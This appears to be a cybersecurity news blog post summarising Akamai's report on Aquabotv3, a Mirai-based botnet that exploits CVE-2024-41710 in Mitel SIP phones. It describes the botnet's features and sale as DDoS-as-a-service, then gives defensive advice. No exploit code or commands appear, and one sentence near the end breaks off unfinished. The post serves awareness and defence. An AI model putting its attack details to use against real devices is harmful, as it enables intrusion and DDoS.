The Rise of Aquabotv3: A New Cyber Threats

2025-01-28

In recent months, a serious development in the world of cybersecurity has emerged that signals a new chapter in botnet evolution. Akamai’s Security Intelligence and Response Team (SIRT) recently uncovered a new and significantly advanced version of the Aquabot malware. This latest iteration, dubbed “Aquabotv3,” has been designed to exploit vulnerabilities in Mitel SIP phones, bringing forth new and more dangerous features. Here’s a breakdown of the growing threat.

Summary:

Akamai’s SIRT has discovered the third version of Aquabot, a botnet based on the Mirai framework, which is now targeting vulnerabilities in Mitel SIP phones. The primary attack vector stems from a critical vulnerability, CVE-2024-41710, found in the Mitel 6800, 6900, and 6900w series SIP phones that run outdated firmware. This flaw allows attackers to inject arbitrary commands via a manipulated HTTP POST request.

The malware, which was first discovered in mid-2024, has been actively exploited since January 2025, when proof-of-concept code became public. The attackers use this vulnerability to install a shell script that downloads and executes the Aquabot malware. While earlier versions of Aquabot closely followed the Mirai botnet’s tactics, version 3 introduces new capabilities, such as the “report_kill” functionality, which allows the malware to communicate with its command-and-control (C2) server when it receives kill signals, indicating an effort to monitor and protect the botnet’s health.

In addition to Mitel SIP phones, Aquabotv3 also exploits vulnerabilities in systems like Hadoop YARN and Linksys routers, which broadens the scope of its DDoS attack capabilities. Alarmingly, the malware has been marketed as a “DDoS-as-a-service” on Telegram, luring unsuspecting buyers with claims of legitimate DDoS testing.

What Undercode Says:

The emergence of Aquabotv3 signals a dangerous evolution of cyber threats, with botnets becoming not only more sophisticated but also more targeted in their approach. Mirai-based botnets have historically been a major concern for cybersecurity, and this new version brings with it several alarming developments.

One of the most notable features of Aquabotv3 is its advanced “report_kill” functionality. This feature allows the botnet to report back to its C2 server when it is being shut down, which could enable attackers to quickly reactivate the botnet or adjust their strategies to avoid detection and disruption. This level of persistence and self-preservation has not been seen in earlier versions of the malware, making it a far more resilient threat.

Additionally, the use of obfuscation techniques, like renaming the malware as “httpd.x86,” is a clear sign that attackers are taking steps to ensure their malware goes undetected. By leveraging a variety of different ports for communication with the C2 servers, the malware avoids easy identification and blocks by network defenses. This adds a layer of complexity for defenders who are trying to stop the botnet before it can be activated.

The broader attack surface of Aquabotv3 is another reason for concern. While SIP phones were initially the primary target, the malware also targets other vulnerable devices, like Linksys routers and Hadoop YARN systems. This wide-reaching scope significantly enhances the botnet’s ability to launch distributed denial-of-service (DDoS) attacks, potentially overwhelming entire networks by harnessing the combined power of a vast range of compromised devices.

Another disturbing aspect of this attack is the potential commercialization of the malware. By marketing the botnet as a “DDoS-as-a-service” on platforms like Telegram, attackers are providing a cheap and accessible way for others to carry out large-scale DDoS attacks. This lowers the barrier to entry for cybercriminals and allows even those with limited technical expertise to launch damaging attacks.

For organizations, especially those relying on Mitel SIP phones or other IoT devices, the key takeaway is clear: patch management is critical. The exploitation of CVE-2024-41710 is a reminder of how crucial it is to regularly update software and firmware to protect against newly discovered vulnerabilities. In addition, enforcing strong authentication practices, eliminating default credentials, and monitoring network traffic for unusual patterns are essential steps in defending against this evolving threat.

The broader implications of

In conclusion, Aquabotv3’s emergence highlights the persistent and growing threat posed by Mirai-based botnets. As these malicious networks evolve with new features and more sophisticated capabilities, businesses and individuals alike must prioritize cybersecurity practices to safeguard their networks against such evolving threats.